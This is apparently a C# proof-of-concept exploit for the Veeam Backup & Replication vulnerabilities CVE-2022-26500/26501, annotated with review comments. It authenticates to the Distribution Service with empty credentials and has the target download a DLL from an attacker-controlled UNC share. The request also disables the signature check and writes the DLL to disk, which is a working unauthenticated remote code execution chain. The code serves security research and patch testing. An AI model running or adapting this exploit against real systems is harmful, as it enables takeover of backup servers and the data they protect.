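/*
 * # Vulnerability: CVE-2022-26500 | CVE-2022-26501 Veeam Backup & Replication Remote Code Execution Vulnerability
 * # Description: Firstly, shout out to Nikita Petrov (@ultrayoba) for discovering these two interesting
 *   vulnerabilities. The Veeam Distribution Service (TCP 9380 by default) allows unauthenticated users to
 *   access internal API functions. A remote attacker may send input to the internal API which may lead to
 *   uploading and executing of malicious code.
 * # Exploit Author: Sina Kheirkhah (@SinSinology) of @SummoningTeam
 * # More Details:
 *   https://www.mdsec.co.uk/2022/03/abc-code-execution-for-veeam/
 *   https://www.veeam.com/kb4288
 *   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26500
 *   https://twitter.com/ultrayoba
 *   https://y4er.com/posts/cve-2022-26500-veeam-backup-replication-rce/
 */

/// <summary>
/// Proof of concept for CVE-2022-26500 / CVE-2022-26501. Opens a NegotiateStream to the Veeam
/// Distribution Service with empty credentials (the reported weakness: the service accepts an
/// unauthenticated client) and submits an "FISpec" task that asks the service to fetch a DLL from
/// a UNC path and write it to a local path on the target. For authorized testing only.
/// </summary>
internal class Program
{
    /// <summary>Default Veeam Distribution Service port (see header comment).</summary>
    private const int DefaultPort = 9380;

    /// <summary>
    /// Default UNC path the target is asked to fetch the payload from. Kept byte-for-byte from the
    /// original PoC. NOTE(review): this is a verbatim (@) string, so the doubled backslashes are part
    /// of the value — confirm the share path the target actually resolves, or pass the real one as
    /// the second command-line argument.
    /// </summary>
    private const string DefaultPayloadUncPath = @"\\\\192.168.56.1\\payload\\VeeamDeploymentDll.dll";

    /// <summary>Path on the target where the service is asked to write the fetched file (same caveat on backslashes).</summary>
    private const string DefaultRemotePath = @"C:\\poc.dll";

    /// <summary>Socket to the Distribution Service; disposed by <see cref="Main"/> once the exchange is done.</summary>
    static TcpClient client = null;

    /// <summary>
    /// Entry point.
    /// </summary>
    /// <param name="args">
    /// args[0]: target IP address (required).
    /// args[1]: UNC path of the payload DLL the target should fetch (optional; defaults to
    /// <see cref="DefaultPayloadUncPath"/>).
    /// args[2]: TCP port of the Distribution Service (optional; defaults to 9380).
    /// </param>
    static void Main(string[] args)
    {
        // Validate arguments up front instead of crashing with IndexOutOfRange / FormatException.
        IPAddress ipAddress;
        if (args == null || args.Length < 1 || !IPAddress.TryParse(args[0], out ipAddress))
        {
            Console.WriteLine("usage: <target-ip> [payload-unc-path] [port]");
            return;
        }

        string payloadUncPath = args.Length > 1 && !string.IsNullOrWhiteSpace(args[1])
            ? args[1]
            : DefaultPayloadUncPath;

        int port = DefaultPort;
        if (args.Length > 2 && !int.TryParse(args[2], out port))
        {
            Console.WriteLine("usage: <target-ip> [payload-unc-path] [port]");
            return;
        }

        // Per-run key handed to SStringMasker.Mask for the credential-style fields (all empty here).
        // The exact masking scheme is defined by SStringMasker, not visible in this file.
        string guidKey = String.Format("{{{0}}}", Guid.NewGuid().ToString());
        IPEndPoint remoteEP = new IPEndPoint(ipAddress, port);

        client = new TcpClient();
        using (client) // dispose the socket even if the handshake or the request throws
        {
            client.Connect(remoteEP);
            Console.WriteLine("Client connected to {0}.", remoteEP.ToString());

            NetworkStream clientStream = client.GetStream();
            // leaveInnerStreamOpen = false: closing authStream also closes clientStream.
            NegotiateStream authStream = new NegotiateStream(clientStream, false);
            try
            {
                // The weakness under test: a Negotiate handshake with an empty user/password gets
                // a usable session on vulnerable builds. Identification-level impersonation suffices.
                NetworkCredential netcred = new NetworkCredential("", "");
                authStream.AuthenticateAsClient(netcred, "", ProtectionLevel.EncryptAndSign, TokenImpersonationLevel.Identification);

                CInputXmlData FIData = new CInputXmlData("FIData");
                CInputXmlData FISpec = new CInputXmlData("FISpec");

                // Scope/method selectors for the internal API. The numeric values come from the
                // original PoC; their meaning is not documented here.
                FISpec.SetInt32("FIScope", 190);
                FISpec.SetGuid("FISessionId", Guid.Empty);
                FISpec.SetInt32("FIMethod", 25);

                // The target is told to deploy to itself (loopback), i.e. the host running the service.
                FISpec.SetString("SystemType", "WIN");
                FISpec.SetString("Host", "127.0.0.1");
                IPAddress[] HostIps = new IPAddress[] { IPAddress.Loopback };
                String[] strAddrs = HostIps.Select(cad => cad.ToString()).ToArray();
                FISpec.SetStrings("HostIps", strAddrs);

                // Credential-style fields are masked but empty: no real credentials are needed.
                FISpec.SetString("User", SStringMasker.Mask("", guidKey));
                FISpec.SetString("Password", SStringMasker.Mask("", guidKey));

                FISpec.SetString("TaskType", "Package");
                FISpec.SetString("FixProductType", "");
                // Key spelled "Veresion" as in the original PoC — presumably it must match the
                // server-side field name; do not "correct" it without checking the service.
                FISpec.SetString("FixProductVeresion", "");
                FISpec.SetUInt64("FixIssueNumber", 0);

                FISpec.SetString("SshCredentials", SStringMasker.Mask("", guidKey));
                FISpec.SetString("SshFingerprint", "");
                FISpec.SetBool("SshTrustAll", true);
                FISpec.SetBool("IsWindows", true);
                FISpec.SetBool("IsFix", true);
                // Presumably skips signature verification of the fetched file — the knob that lets an
                // unsigned DLL through. Confirm against the service's handling of this flag.
                FISpec.SetBool("CheckSignatureBeforeUpload", false);
                FISpec.SetEnum("DefaultProtocol", ESSHProtocol.Rebex);
                FISpec.SetString("FileRelativePath", "FileRelativePath");

                // FileProxyPath is presumably fetched by the *target*, so the share must be reachable
                // from the target (typically outbound SMB/445 to the attacker host), not from this client.
                FISpec.SetString("FileProxyPath", payloadUncPath);
                FISpec.SetString("FileRemotePath", DefaultRemotePath);

                FIData.InjectChild(FISpec);

                string request = FIData.Root.OuterXml;
                Console.WriteLine(request);
                new BinaryWriter(authStream).WriteCompressedString(request, Encoding.UTF8);

                // NOTE(review): int.MaxValue puts no bound on how much the service may send back.
                // Fine for a one-shot PoC against a single target; cap it if this is reused in tooling.
                string response = new BinaryReader(authStream).ReadCompressedString(int.MaxValue, Encoding.UTF8);
                Console.WriteLine("response:");
                Console.WriteLine(response);
            }
            catch (Exception e)
            {
                // Surface handshake/protocol failures (e.g. a patched service refusing empty credentials).
                Console.WriteLine(e);
            }
            finally
            {
                authStream.Close();
            }
        }

        // Keep the console open for interactive runs; ReadKey throws when stdin is redirected.
        if (!Console.IsInputRedirected)
        {
            Console.ReadKey();
        }
    }
}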